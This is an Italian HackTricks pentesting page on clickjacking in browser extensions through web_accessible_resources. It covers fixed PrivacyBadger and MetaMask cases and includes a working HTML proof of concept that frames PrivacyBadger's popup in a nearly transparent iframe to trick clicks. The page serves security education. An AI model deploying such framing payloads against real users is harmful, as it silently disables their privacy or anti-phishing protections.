BrowExt - ClickJacking

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale di PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.

Informazioni di Base

Questa pagina sfrutterà una vulnerabilità di ClickJacking in un'estensione del Browser. Se non sai cos'è il ClickJacking, controlla:

pageClickjacking

Le estensioni contengono il file manifest.json e quel file JSON ha un campo web_accessible_resources. Ecco cosa dicono i documenti di Chrome a riguardo:

Queste risorse sarebbero quindi disponibili in una pagina web tramite l'URL chrome-extension://[PACKAGE ID]/[PATH], che può essere generato con il metodo extension.getURL. Le risorse autorizzate sono servite con gli opportuni header CORS, quindi sono disponibili tramite meccanismi come XHR.1

Le web_accessible_resources in un'estensione del browser non sono solo accessibili tramite il web; operano anche con i privilegi intrinseci dell'estensione. Ciò significa che hanno la capacità di:

Cambiare lo stato dell'estensione
Caricare risorse aggiuntive
Interagire con il browser fino a un certo punto

Tuttavia, questa funzionalità presenta un rischio per la sicurezza. Se una risorsa all'interno di web_accessible_resources ha una qualsiasi funzionalità significativa, un attaccante potrebbe potenzialmente incorporare questa risorsa in una pagina web esterna. Gli utenti inconsapevoli che visitano questa pagina potrebbero attivare involontariamente questa risorsa incorporata. Tale attivazione potrebbe portare a conseguenze indesiderate, a seconda delle autorizzazioni e delle capacità delle risorse dell'estensione.

Esempio di PrivacyBadger

Nell'estensione PrivacyBadger, è stata identificata una vulnerabilità relativa alla directory skin/ dichiarata come web_accessible_resources nel seguente modo (Controlla il post originale):

"web_accessible_resources": [
"skin/*",
"icons/*"
]

Questa configurazione ha portato a un potenziale problema di sicurezza. In particolare, il file skin/popup.html, che viene visualizzato al momento dell'interazione con l'icona di PrivacyBadger nel browser, potrebbe essere incorporato all'interno di un iframe. Questo embedding potrebbe essere sfruttato per ingannare gli utenti facendoli cliccare involontariamente su "Disabilita PrivacyBadger per questo Sito Web". Tale azione comprometterebbe la privacy dell'utente disabilitando la protezione di PrivacyBadger e potenzialmente esponendo l'utente a un aumento del tracciamento. Una dimostrazione visuale di questo exploit può essere visualizzata in un esempio video di ClickJacking fornito all'indirizzo https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm.

Per affrontare questa vulnerabilità, è stata implementata una soluzione diretta: la rimozione di /skin/* dall'elenco delle web_accessible_resources. Questo cambiamento ha efficacemente attenuato il rischio garantendo che il contenuto della directory skin/ non potesse essere accessibile o manipolato tramite risorse accessibili via web.

La correzione è stata semplice: rimuovere /skin/* dalle web_accessible_resources.

PoC

<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->

<style>
iframe {
width: 430px;
height: 300px;
opacity: 0.01;
float: top;
position: absolute;
}

#stuff {
float: top;
position: absolute;
}

button {
float: top;
position: absolute;
top: 168px;
left: 100px;
}

</style>

<div id="stuff">
<h1>
Click the button
</h1>
<button id="button">
click me
</button>
</div>

<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>

Esempio di Metamask

Un post sul blog su un ClickJacking in metamask può essere trovato qui. In questo caso, Metamask ha risolto la vulnerabilità controllando che il protocollo utilizzato per accedervi fosse https: o http: (non chrome: per esempio):

Un altro ClickJacking risolto nell'estensione di Metamask era che gli utenti potevano fare clic per aggiungere alla whitelist quando una pagina risultava sospetta di phishing a causa di “web_accessible_resources”: [“inpage.js”, “phishing.html”]. Poiché quella pagina era vulnerabile al Clickjacking, un attaccante poteva abusarne mostrando qualcosa di normale per far clic alla vittima per aggiungerla alla whitelist senza accorgersene, per poi tornare alla pagina di phishing che sarebbe stata aggiunta alla whitelist.

Esempio di Steam Inventory Helper

Controlla la seguente pagina per vedere come un XSS in un'estensione del browser è stato concatenato con una vulnerabilità di ClickJacking:

pageBrowExt - XSS Example

Riferimenti

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
Ottieni il merchandising ufficiale PEASS & HackTricks
Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.

PreviousBrowser Extension Pentesting Methodology NextBrowExt - permissions & host_permissions

Last updated 3 days ago